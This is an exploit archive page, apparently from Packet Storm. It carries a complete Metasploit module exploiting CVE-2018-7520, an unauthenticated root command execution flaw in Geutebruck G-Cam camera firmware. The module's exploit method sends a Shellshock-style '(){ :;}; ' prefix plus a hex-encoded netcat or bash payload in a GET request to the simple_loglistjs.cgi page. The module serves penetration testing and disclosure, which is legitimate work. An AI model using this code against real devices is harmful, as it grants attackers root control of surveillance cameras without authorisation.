Geutebruck simple_loglistjs.cgi Remote Command Execution

Geutebruck simple_loglistjs.cgi Remote Command Execution: Posted Jul 2, 2018; Authored by Davy Douhine, Nicolas Mattiocco | Site metasploit.com; This Metasploit module exploits a an arbitrary command execution vulnerability. The vulnerability exists in the /uapi-cgi/viewer/simple_loglistjs.cgi page and allows an anonymous user to execute arbitrary commands with root privileges. Firmware <= 1.12.0.19 are concerned. Tested on 5.02024 G-Cam/EFD-2250 running 1.12.0.4 firmware.; tags | exploit, arbitrary, cgi, root; advisories | CVE-2018-7520; SHA-256 | b06cdd72647a3c5ae361e51c53891472ce5c21a9a290972228f38c754cae44d6; Download | Favorite | View

Geutebruck simple_loglistjs.cgi Remote Command Execution

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Geutebruck simple_loglistjs.cgi Remote Command Execution',
      'Description'    => %q{
        This module exploits a an arbitrary command execution vulnerability. The
        vulnerability exists in the /uapi-cgi/viewer/simple_loglistjs.cgi page and allows an
        anonymous user to execute arbitrary commands with root privileges.
        Firmware <= 1.12.0.19 are concerned.
        Tested on 5.02024 G-Cam/EFD-2250 running 1.12.0.4 firmware.
      },
      'Author'         =>
        [
          'Nicolas Mattiocco', #CVE-2018-7520 (RCE)
          'Davy Douhine' #CVE-2018-7520 (RCE) and metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2018-7520' ],
          [ 'URL', 'http://geutebruck.com' ],
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-079-01' ]
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 1024,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic netcat bash',
            }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 20 2018'))
 
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to webapp', '/uapi-cgi/viewer/simple_loglistjs.cgi']),
      ], self.class)
  end
 
  def exploit
    header = "(){ :;}; "
    encpayload = "#{header}#{payload.encoded}"
    uri = target_uri.path + "?" + Rex::Text.uri_encode(encpayload, "hex-all")
    print_status("#{rhost}:#{rport} - Attempting to exploit...")
    res = send_request_raw(
      {
        'method' => 'GET',
        'uri'    => uri
    })
  end
 
end

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Geutebruck simple_loglistjs.cgi Remote Command Execution

Geutebruck simple_loglistjs.cgi Remote Command Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Geutebruck simple_loglistjs.cgi Remote Command Execution

Share This

Geutebruck simple_loglistjs.cgi Remote Command Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems